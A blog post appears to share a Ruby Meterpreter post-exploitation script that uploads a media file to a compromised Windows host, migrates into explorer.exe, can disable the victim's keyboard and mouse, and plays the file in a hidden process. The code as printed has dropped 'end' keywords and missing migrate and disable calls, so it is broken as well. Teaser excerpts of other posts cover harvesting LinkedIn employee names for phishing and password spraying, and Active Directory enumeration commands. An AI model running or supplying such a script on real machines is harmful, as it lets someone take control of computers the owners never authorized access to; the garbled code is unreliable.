Skip to main content

Rickroll Meterpreter Script

In order to be well prepared for April Fools day I decided to put out a rickroll meterpreter script.

It defaults to looking for rickroll.mp3 in the metasploit framework root directory, but you can use another file with the -f option. I don't parse out the name so you will have to copy it into the metasploit directory.

You can also use any file format supported by windows media player so you can have it play a wmv (even better). By default the process is hidden, but you can make it visible with a -v option.

New Features!
And just for added fun, throw in a -k to disable the keyboard or -m to disable the mouse or you can go all in by using the -e to disable the mouse and keyboard and save precious keystrokes.

Here is the file:

Put it in framework3/meterpreter/scripts

# Provided by Tim Medin at timmedin[at]gmail [dot] com
# Uploads the rick roll'ing mp3 and then runs it as a hidden process
# You can also upload a different file (like a wmv video) and have it display -v
# Known Issues: I don't parse the file name provided by -f so make
#   sure the file is in the framework's root directory
# Added disable keyboard and mouse features
# *** Thanks for help from dark operator (Carlos Perez) ***
def message
        print_status "Rickroll'ing Meterpreter Script"
def usage
        "Windows Rickroll Meterpreter Script\n" +
        "Usage: rickroll [-h] [-k] [-m] [-e] [-v] \[-f <filename>\]\n" +

@@exec_opts =
  "-h"  => [ false,  "Help menu."],
  "-f"  => [ false,  "File to upload"],
  "-k"  => [ false,  "Disable Keyboard"],
  "-m"  => [ false,  "Disable Mouse"],
  "-e"  => [ false,  "Disable Keyboard & Mouse"],
  "-v"  => [ false,  "Visible"]

rick = "rickroll.mp3"
mediaplayer = "\"C:\\Program Files\\Windows Media Player\\wmplayer.exe\""
visible = false
keyboard = true
mouse = true

@@exec_opts.parse(args) { |opt, idx, val|
        case opt
                when "-k"
                        keyboard = false
                when "-m"
                        mouse = false
                when "-e"
                        keyboard = false
                        mouse = false
                when "-v"
                        visible = true
                when "-f"
                        rick = val
                when "-h"

session = client

#upload file
print_status("Uploading file #{rick}")
uploadpath = session.fs.file.expand_path("%temp%") + "\\#{rand(100)}.mp3"
client.fs.file.upload_file(uploadpath, rick)
print_status("Uploaded file to #{uploadpath}")

if (session.sys.config.getuid == "NT AUTHORITY\\SYSTEM")
        go = false
        process2mig = "explorer.exe"
        session.sys.process.get_processes().each do |x|
        if (process2mig.index(x['name'].downcase))
                print_status("\t#{process2mig} Process found, migrating..")
                print_status("Migration Successful!!")
                go = true
        go = true

if (go)
        if (!mouse)
                print_status("Disabling mouse to extend the pain!")
        if (!keyboard)
                print_status("Disabling keyboard to extend the pain!")
        print_status("Rick rolling!")
        client.sys.process.execute("#{mediaplayer} \"#{uploadpath}\"", nil, {'Hidden' => !visible})
        print_status("Need logged in user to execute, cannot find explorer.exe to migrate")


Popular posts from this blog

Extracting Users from LinkedIn via Burp

We do a lot of pen tests and red teaming at Red Siege. Part of reconnaissance includes gathering a list of employees from a target organization. Typically, those usernames will be used in either phishing or password spray attacks (trying a few passwords across a long list of users). LinkedIn is a treasure trove of information! I'm going to use my good friends at Black Hills Information Security as my guinea pigs (sorry, and thanks!). The tool is here. First, let's look at what the data from LinkedIn looks like a response.

After performing a search for "Black Hills Information Security" we can look at the requests and responses. LinkedIn includes all the user information in responses to "/voyager/api/mux".

We can click the "Next" button a few times in our search to load multiple pages of info. Now, for the extraction. First, select everything in the "HTTP history" with Ctrl+A or Command+A on macOS. Second, right click in the top portion. …

Beyond Net User - Part 1: Limitations of the "Net" commands

I've had a number of cases where the Windows "net user", "net group", and "net localgroup" have failed me. I've had SQLMap fail to give the last line of "net user" output, I've had "net group /domain" not give me the full names (I still don't get how that failed!). On top of that, the commands don't support wildcards. Also, the output of those commands is a pain to parse due to the columns. I'd much prefer to use the AD PowerShell cmdlets, but those aren't always available. I set to find other ways to get the same data. First, let's look at the limitations of the "net" commands.
Net command limitations Hiding Groups in Groups Often when pen testing and red teaming, we would like to figure out information about the domain, most notably the members of the Domain Admins group. Output of the net group "domain admins" command as shown below.

It shows three members: Administrator, sqlagent,…

Beyond Net User - Part 2: DS Commands

In the previous post we discussed some of the limitations of Net commands. Most notably, the output limitation (doesn't show all groups) and it doesn't allow for flexible searching. In this post we'll discuss the DS commands to get around these limitations.
DSGet, DSQuery, DS* While these tools are useful, they aren't always available. As a pen tester and red teamer, I have to live with what I can find on the systems I come across. I find that these tools are still more widespread than the latest PowerShell Active Directory cmdlets, at least on non-system administrator systems. Here is a useful Stack Overflow post on the subject. Recursive Searches In the last post, we discussed a limitation in net group in that it doesn't show groups in other groups. The DS commands do! As a reminder, let's take a look at what we saw with net group when looking at the list of domain administrators.

Now let's do the same search, but use the dsquery and dsget.
dsquery group -…